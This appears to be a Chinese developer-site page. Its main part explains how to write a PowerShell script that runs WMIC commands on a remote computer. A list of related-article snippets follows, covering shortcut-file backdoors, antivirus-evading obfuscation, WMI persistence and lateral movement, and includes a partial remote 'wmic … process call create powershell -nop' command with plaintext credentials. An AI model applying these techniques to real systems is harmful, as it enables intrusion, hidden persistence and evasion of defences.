如何创建wmic powershell脚本

创建wmic powershell脚本的步骤如下：

打开文本编辑器，例如记事本或任何其他文本编辑器。
在新建的文本文件中，输入以下内容：

$computer = "目标计算机名称"
$command = "wmic 命令"

Invoke-Command -ComputerName $computer -ScriptBlock { 
    param($command)
    Invoke-Expression $command
} -ArgumentList $command

将"目标计算机名称"替换为您要运行脚本的计算机的名称或IP地址。
将"wmic 命令"替换为您要在目标计算机上运行的实际wmic命令。例如，如果您想要获取目标计算机的操作系统信息，可以使用以下命令：

$command = "wmic os get Caption, Version"

保存文件并将其命名为脚本名称，以.ps1为扩展名，例如"script.ps1"。
打开PowerShell控制台。
使用cd命令导航到保存脚本的目录。
运行以下命令以启用执行脚本的权限：

Set-ExecutionPolicy RemoteSigned

运行以下命令以执行脚本：

.\script.ps1

以上步骤将创建一个使用PowerShell的wmic脚本，该脚本可以在远程计算机上运行wmic命令。请注意，您需要具有适当的权限才能在目标计算机上执行所需的wmic命令。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

如何创建Powershell持久隐蔽后门

用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码，原始应用程序仍然启动，原始图标保留，并且没有powershell.exe窗口弹出。...1、安装后门这次需要用到powershell攻击框架Empire，使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本...-LNKPath是要利用的lnk的路径，每次打开这个lnk文件时都会执行原始的应用程序和 -EncScript后面的恶意powershell代码先通过empire生成反弹的powershell代码 ....看到以上界面就代表后门安装完成当我们运行navicat快捷方式的同时可以看到powershell.exe已经悄悄的链接empire ?...2、实现原理它会将原来快捷目标修改为powershell.exe的地址，并且利用powershell去运行navicat程序与恶意代码。 ? 解密后的代码 ?

1.5K7 0

如何用Chimera进行PowerShell脚本混淆

Chimera Chimera是一款针对PowerShell脚本代码的混淆工具，广大研究人员可以利用Chimera来对自己的PowerShell脚本代码进行混淆处理，并绕过目标设备的AMIS和其他反病毒解决方案...该工具可以通过字符串替换和变量连接来规避常见的签名检测，并让恶意的PowerShell脚本无法触发AV检测。...Chimera会对脚本源代码进行多种混淆处理，transformer函数会将一个字符串分割成多个部分，并将它们重构成新的变量。...reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p Shells 在该工具的shells/目录下，包含了一个Nishang脚本和一些通用脚本...，所有的脚本都已经经过测试并且可以正常工作。

5351 0

PowerShell 脚本必备命令

PowerShell命令最近工作中写了大量的 PowerShell 脚本，将一些常用的命令分享出来，希望能帮助到大家。...1.PowerShell 连接 SQLServer 数据库，并执行 sql 语句： # 方法一：如果有账户密码，可以使用此方法登陆 #$Server = "10.181.100.8" #...输出 csv 文件： Export-Csv -Path 文件路径 -Encoding UTF8 -NoTypeInformation -Force 3.PowerShell 输出 txt 文件： Out-File...-FilePath 文件路径 -Encoding utf8 -Force 4.PowerShell 创建目录，如果有不做任何操作： # 创建目录 $Directory = 目录 if(Test-Path...$Directory ){ }else{ New-Item -Path $Directory -ItemType Directory -Force } 5.PowerShell 删除文件中的空行

3K2 0

PowerShell系列（六）：PowerShell脚本执行策略梳理

PowerShell 脚本执行策略用于控制何时以及何种方式执行 PowerShell 脚本。通过执行策略可以限制 PowerShell 脚本的执行范围，为系统管理员提供一定的安全保障。...策略可以限制执行脚本的用户、限制执行脚本的来源等等。这些策略可以在计算机本地或组策略中进行配置。最终保护计算机免受恶意脚本和非法操作的侵害。今天给大家讲解PowerShell脚本执行策略相关的知识！...● Bypass：脚本执行没有任何限制● RemoteSigned：本地计算机上的本地脚本，不需要数字签名直接允许；从Internet或其他计算机下载的脚本，需要脚本必须经过数字签名才能运行。...● UserPolicy：由计算机当前用户的组策略设置● Process：范围 Process 仅影响当前 PowerShell 会话;执行策略保存在环境变量 $env:PSExecutionPolicyPreference...关闭 PowerShell 会话时，变量和值将被删除。● CurrentUser：执行策略仅影响当前用户。它存储在 HKEY_CURRENT_USER 注册表子项中。

8711 1

dotnet core 使用 PowerShell 脚本

本文告诉大家如何在 dotnet core 通过 Host PowerShell 的方法使用 PowerShell 脚本本文提供的方法需要在 dotnet core 2.1 和以上的版本，对于 dotnet...core 2.1 以下暂时只能通过命令行调用 PowerShell.exe 的方法调用在使用之前请创建一个 dotnet core 程序然后安装下面几个 Nuget 库 Microsoft.PowerShell.Commands.Diagnostics...Microsoft.PowerShell.SDK Microsoft.WSMan.Management 通过 System.Management.Automation.PowerShell...可以快速使用 PowerShell 脚本使用 PowerShell.Create() 创建一个 PowerShell 类，在 PowerShell 类先添加脚本，然后就可以运行，运行函数会返回运行的返回的内容...Console.Write(result.ToString()); } } } 如使用下面的脚本

1.7K2 0

dotnet core 使用 PowerShell 脚本

8831 0

Red Team 常用 Powershell 脚本

各种常用PowerShell脚本： Search-EventForUser.ps1：在 Windows 事件日志中搜索特定用户的 Powershell 脚本 Search-FullNameToSamAccount.ps1...列出进程、所有者和命令行参数 Remote-RegisterProtocolHandler.ps1：使用协议处理程序运行您的命令以绕过某些检测 Add-UserLogonScript：为特定用户添加登录脚本...\Get-ProcessList.ps1; Get-ProcessList Remote-RegisterProtocolHandler.ps1 用法此 cmdlet 创建将调用您的有效负载的协议处理程序

7102 0

PowerShell系列（五）：PowerShell通过脚本方式运行笔记

同样的为了实现PowerShell脚本的保存、方面在别的服务器迁移，一般都是先编写脚本，然后通过脚本文件执行完成相应的运维任务。...\test.ps1 #运行命令2、直接指定完整文件路径执行完整psl1脚本文件F:\桌面\test.ps1具体如下图3、通过cmd命令直接执行需要加关键字PowerShell才可以识别是执行的PowerShell...命令格式：PowerShell ps1脚本文件完整路径4、通过Windows计划任务执行PowerShell脚本PowerShell 脚本默认无法执行，需要先修改 PowerShell 执行策略（ExecutionPolicy...输入上面的命令后会提示我们如何对策略进行修改，这里我们选择y，然后按下回车键。...首先打开Windows任务计划程序创建一个计划任务打开创建计划任务常规选项卡，然后输入名称和描述，具体如下图：切换到触发器选项卡，设置每五分钟执行一次。

1.9K4 1

Powershell绕过执行及脚本混淆

1、与文件系统交互，运行应用程序 2、创建及运行脚本( .ps1 ) 和其他脚本语言一样，支持将命令列表编写成脚本，但是一个 .ps1 文件默认是以记事本打开，而非 powershell 执行(这和 powershell...能够利用 .Net 类型和 COM 对象是 PowerShell 的最大特点，这让 PowerShell 能够最大限度的利用现有资源，创建了 .Net 类型和 Dom 对象后可以使用这些对象的属性及方法...5.PSConsole：使用 PSConsole 指定 powershell 控制文件 powershell 脚本分析几个较为常用的执行脚本的语句： 1、本地绕过执行策略执行脚本 PowerShell.exe...== 从开头就可以看到它在绕过执行策略时使用了 -nop 不加载 powershell 配置文件，-w 隐藏窗口（执行该命令后会直接隐藏命令行窗口），-sta 使用 sta 模式创建 GUI 界面，-enc...知攻焉知防，既然了解了 powershell 最基础的攻击方法，那么了解如何检测 powershell 攻击活动也是必不可少的：如何检测powershell攻击活动

2.8K0 0

利用powershell 生成sqlserver 对象脚本

介绍本篇将介绍如何使用powershell 生成脚本。解决利用 Script() 方法首先，创建一个server 对象实例，然后连接它。...生成索引脚本既然我们已经为创建表生成了脚本，那么我们也可以为表中相应的索引生成脚本。...注意，在使用SMO的Windows PowerShell中，只需几行代码就可以轻松地生成SQL脚本。...在下面Windows PowerShell脚本中，我们将使用Microsoft.SqlServer.Management.Smo.Scripter namespace这个新对象。...这些属性定义了Scripter对象如何生成SQL脚本。下面是我从SQL Server Management Studio中选取的一些选项作为示例。

9061 0

WMIC命令的利用技巧

WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具），提供了从命令行接口和批命令脚本执行系统管理的支持。...命令可以调用PowerShell脚本，接着我们通过调用 IEX DownloadString 函数来远程加载执行 powershell payload。...wmic /NODE:192.168.1.10/user:"administrator" /password:"123123" PROCESS call create "powershell -nop...executablepath // 获取进程的绝对路径 // 进程创建相关命令 wmic process call create QQ wmic process call create "C:/...反弹后门 Wmic命令不止可用于执行命令，该命令还能够从本地或从远程URL，调用XSL（可扩展样式表语言）脚本，我们可以通过构建恶意的XSL脚本，从而完成上线。

7443 0

WMI利用（权限维持）

那么在我们短暂的获取权限后，如何才能将权限持久化，也就是所说的权限维持住呢？...| Remove-WmiObject -Verbose WMI永久事件注意：没有指定时间轮询则需要机器重启才可以进行WMI轮询，需要注意的一点是，WMI可以任意指定触发条件，例如用户退出，某个程序创建...\root\subscription:CommandLineEventConsumer.Name="BugSecConsumer"' Powershell添加永久事件注意：可以考虑添加Powershell...SELECT * FROM __TimerEvent WITHIN 10 WHERE TimerID = 'Trigger' 上线C2 注意：将上述Powershell脚本替换其执行的Payload进行本地执行...若想做成远程下载格式，则需要将Powershell做好免杀的操作。

1.9K2 1

DevOpt：WMIC命令使用技巧

在WMIC出现之前，如果要管理WMI系统，必须使用一些专门的WMI应用，例如SMS，或者使用WMI的脚本编程API，或者使用象CIM Studio之类的工具。...命令可以调用PowerShell脚本，接着我们通过调用 IEX DownloadString 函数来远程加载执行 powershell payload。...wmic /NODE:192.168.1.10/user:"administrator" /password:"123123" PROCESS call create "powershell -nop...executablepath // 获取进程的绝对路径 // 进程创建相关命令 wmic process call create QQ wmic process call create "C:/...反弹后门 Wmic命令不止可用于执行命令，该命令还能够从本地或从远程URL，调用XSL(可扩展样式表语言)脚本，我们可以通过构建恶意的XSL脚本，从而完成上线。

1141 0

WMI讲解(是什么，做什么，为什么)

WMI的讲解(是什么，做什么，为什么) 讲在前面作者：pingpig@深蓝攻防实验室 WMI在笔者所参与的项目中发现目前攻防中利用依旧非常频繁，尤其在横向移动中，利用wmic或者powershell...而脚本语言则要支持WMI Scripting API，间接与下层通信。对于.net平台语言，则要使用System.Management域相关功能与下层通信。...在系统启动时，WMI服务会创建诸如root\default、root\cimv2和root\subscription等WMI命名空间，同时会预安装一部分WMI类的定义信息到这些命名空间中。...其他命名空间是在操作系统或者产品调用有关WMI提供者(WMI Provider)时才被创建出来的。简而言之，WMI存储库是用于存储WMI静态数据的存储空间。...可以自定义脚本来进行自动化运维，十分方便，例如可以使用wmic、wbemtest工具。WMIC命令解释。

1.3K1 0

WMI使用学习笔记

call create "C:\Program Files\Tencent\QQ\QQ.exe" #创建新进程 wmic process call create "shutdown.exe -r...-f -t 60" #根据命令创建进程 wmic process where name="qq.exe" delete #根据进程名称删除进程...\Invoke-WmiC 统中禁止执行脚本。...此时的问题主要是没有设置powershell的脚本执行权限，在当前需要使用管理员身份来解除限制： set-executionpolicy remotesigned 然后选择y即可 Invoke-WmiCommand...的使用方法： #导入脚本 Import-Module .

2.2K3 0

进攻性横向移动

那里有几种不同的横向移动技术，我将尝试从高层次的概述中介绍大的以及它们如何工作，但在介绍这些方法之前，让我们澄清一些术语。命名管道：一种进程通过 SMB (TCP 445) 相互通信的方式。...它首先创建一个 PowerShell 脚本，该脚本将对嵌入式有效负载进行 base64 编码，该有效负载从内存运行并压缩为单线，连接到 ADMIN$ 或 C$ 共享并运行 PowerShell 命令，如下所示...示例 WMI 查询如下所示： wmic /node:target.domain /user:domain\user /password:password 进程调用创建“C:\Windows\System32...image.png image.png 所以我们看到，即使通过 WMI，尽管 wmic.exe 能够通过 Powershell 在目标上运行命令，但仍会创建命名管道，那么为什么首先要创建命名管道呢...这只是我记录一些我不知道的事情并弄清楚事情是如何运作的。

2.2K1 0

WMI利用(横向移动)

wmic product list brief 使用Powershell操作wmi Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share #共享.../c ipconfig >c:\ip.txt" wmic上线CS 注意：请注意powershell对于特殊字符的转义，例如“，@，#，$等等。...wmic /NODE:192.168.8.179 /user:"administrator" /password:"Aatest" PROCESS call create "powershell -nop...作为载荷在客户机上执行wmic命令，让指定机器上线CS · XSL 如下为普通的xsl恶意文件，我们可以在下例中修改Run()中的Payload，本地运行恶意程序或者远程使用Powershell...命令，成功创建运行cmd.exe，进程号为3192 3192进程对应的cmd.exe Invoke-WmiCommand 注意：Invoke-WmiCommand.ps1为PowerSploit内置利用脚本

2.8K1 0

内网学习笔记 | 3、本地工作组信息收集

product get name,version 利用 PowerShell 收集软件版本信息 powershell "Get-WmiObject -class Win32_Product |Select-Object...-Property name,version" 查询本机服务信息 wmic service list brief 查询进程列表 tasklist /v wmic 查看进程信息 wmic process...查看补丁列表 wmic qfe get Caption,Description,HotFixID,InstalledOn 查看本机共享 net share 使用 wmic 查看共享列表 wmic share...脚本 wmic 脚本下载地址：https://www.fuzzysecurity.com/scripts/files/wmic_info.rar 直接将脚本在目标主机上运行，运行结束后会生成一个 output.html...的当使用 Empire 使主机上线后，可调用powershell/situational_awareness/host/winenum模块查看本机用户信息、系统基本信息、剪贴板等等信息。

6933 0

如何升级PowerShell

背景：开发的PowerShell 脚本需要使用Invoke-RestMethod命令，发现在老的服务器上不支持这一命令，经过查询得知由于PS版本的问题。...涉及到了PS的升级，需要介绍下PowerShell的版本。发生错误如下： ? 简介：　　 Powershell是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。 ...碰巧我遇到一个使用PS脚本的地方需要使用3.0及其以上，微软这方面的版本升级做的很好只需要简单几个步骤就可以实现升级，并且实现了向前兼容（很遗憾32位版本的只能向后兼容）。...下面就2.0升级3.0的升级步骤进行了介绍： Windows 7 和 Windows Server 2008 R2 内核版本同为6.1，以下步骤说明如何在运行 Windows 7 SP1 和 Windows...总结：本文主要是介绍在windows 2008 或者7 如何升级powershell,碰巧遇到了问题，所以将这个方案记录下来，因为现在很多服务器都是2008r2 ，为日后的运维和升级提供依据参考。

8.6K12 0

WMIC使用浅析

WMIC的非交互模式主要用于批处理或者其他一些脚本文件。在WindowsXP下，低权限用户是不能使用WMIC命令的。在Win7以及之后，低权限用户也可以使用WMIC命令，且不用更改任何设置。...#创建新进程 wmic process call create "shutdown.exe -r -f -t 60" #根据命令创建进程 wmic process where...PowerSploit中的CodeExecution目录下，该脚本主要是通过powershell调用WMIC来远程执行命令，因此本质上还是利用WMIC。...该脚本使用如下 #导入脚本 Import-Module ....在powershell命令行环境执行如下命令，可以以非交互式的方式执行命令，但不会回显执行结果。

2K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

如何创建wmic powershell脚本

相关·内容

如何创建Powershell持久隐蔽后门

如何用Chimera进行PowerShell脚本混淆

PowerShell 脚本必备命令

PowerShell系列（六）：PowerShell脚本执行策略梳理

dotnet core 使用 PowerShell 脚本

dotnet core 使用 PowerShell 脚本

Red Team 常用 Powershell 脚本

PowerShell系列（五）：PowerShell通过脚本方式运行笔记

Powershell绕过执行及脚本混淆

利用powershell 生成sqlserver 对象脚本

WMIC命令的利用技巧

WMI利用（权限维持）

DevOpt：WMIC命令使用技巧

WMI讲解(是什么，做什么，为什么)

WMI使用学习笔记

进攻性横向移动

WMI利用(横向移动)

内网学习笔记 | 3、本地工作组信息收集

如何升级PowerShell

WMIC使用浅析

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐